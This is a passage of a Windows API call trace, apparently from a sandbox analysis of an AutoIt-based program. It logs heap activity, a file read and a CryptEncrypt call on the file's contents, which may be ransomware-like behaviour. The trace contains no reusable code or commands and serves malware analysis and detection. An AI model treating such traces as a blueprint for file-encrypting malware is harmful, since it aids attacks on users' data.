dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0248.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0248.386] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0248.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0248.386] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0248.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77b48 [0248.386] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0248.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0248.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0248.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0248.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0248.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0248.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0248.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0248.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0248.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699a8 [0248.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0248.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0248.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0248.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0248.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51040 [0248.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0248.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0xe53020 [0248.390] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0248.390] ReadFile (in: hFile=0x2d0, lpBuffer=0x3be0048, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3be0048*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0248.393] ReadFile (in: hFile=0x2d0, lpBuffer=0x3be0048, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3be0048*, lpNumberOfBytesRead=0x8cf4f8*=0x5327, lpOverlapped=0x0) returned 1 [0248.394] ReadFile (in: hFile=0x2d0, lpBuffer=0x3be0048, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3be0048*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0248.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0248.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0248.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0248.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0248.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x15327) returned 0x2f14010 [0248.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xe53020 | out: hHeap=0x970000) returned 1 [0248.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0248.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0248.401] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0248.401] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0248.401] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0248.401] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0248.401] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0248.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0248.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x15327) returned 0x2f29340 [0248.403] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14010 | out: hHeap=0x970000) returned 1 [0248.403] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0248.403] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0248.403] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0248.403] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0248.403] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0248.403] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0248.403] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0248.403] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x15327) returned 0x2f14010 [0248.403] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0248.403] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14010 | out: hHeap=0x970000) returned 1 [0248.403] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0248.403] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0248.403] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0248.403] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0248.403] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0248.403] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0248.403] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0248.403] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c28 [0248.403] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c28 | out: hHeap=0x970000) returned 1 [0248.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0248.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0248.404] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77ac8 [0248.404] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0248.404] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0248.404] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55c70 [0248.404] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0248.404] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0248.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55c70 | out: hHeap=0x970000) returned 1 [0248.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0248.404] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0248.404] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54cc8 [0248.404] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0248.404] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0248.404] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0248.404] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0248.404] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x15327) returned 0x2f14010 [0248.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0248.404] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54eb8 [0248.404] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0248.404] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0248.405] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0248.405] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54d38 [0248.405] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0248.405] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0248.405] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0248.405] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54da8 [0248.405] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0248.405] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0248.405] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0248.405] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e515b0 [0248.405] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54300 [0248.405] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0248.405] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0248.405] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0248.405] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0248.405] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x15327) returned 0x2e7f320 [0248.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543f0 [0248.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0248.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0248.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0248.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0248.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0248.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54530 [0248.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0248.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0248.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0248.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0248.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0248.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0248.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0248.410] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0248.410] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0248.410] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0248.410] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0248.410] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0248.410] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0248.410] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0248.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54260 | out: hHeap=0x970000) returned 1 [0248.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0248.410] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0248.411] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0248.411] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55d88 | out: hHeap=0x970000) returned 1 [0248.411] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0248.411] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0248.411] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0248.411] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0248.411] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0248.411] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0248.411] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55fb8 | out: hHeap=0x970000) returned 1 [0248.411] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0248.411] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0248.411] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0248.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0248.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0248.412] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0248.412] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0248.412] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0248.412] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0248.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0248.412] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0248.412] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0248.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55c70 | out: hHeap=0x970000) returned 1 [0248.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0248.412] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0248.420] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0248.421] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0248.421] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e51bb0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0248.421] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0248.421] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0248.421] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0248.421] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0248.422] CryptEncrypt (in: hKey=0xa87490, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x15327, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x15328) returned 1 [0248.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0248.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0248.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0248.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0248.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0248.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518e0 [0248.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0248.422] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0248.422] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0248.422] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0248.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0248.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0248.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0248.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0248.422] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0248.422] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0248.423] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0248.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0248.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0248.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0248.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0248.423] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0248.423] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0248.423] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0248.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0248.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0248.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0248.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0248.423] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0248.423] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0248.423] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0248.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0248.491] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0248.491] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0248.491] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0248.491] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0248.491] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0248.491] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0248.491] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0248.491] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0248.491] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0248.491] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0248.491] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0248.491] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0248.491] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0248.491] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0248.491] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0248.491] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0248.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0248.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0248.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0248.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0248.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0248.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0248.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0248.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0248.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0248.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0248.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0248.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0248.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0248.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0248.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0248.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0248.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0248.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0248.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54238 | out: hHeap=0x970000) returned 1 [0248.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0248.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0248.492] HeapFree (in: hHeap=0x970000, 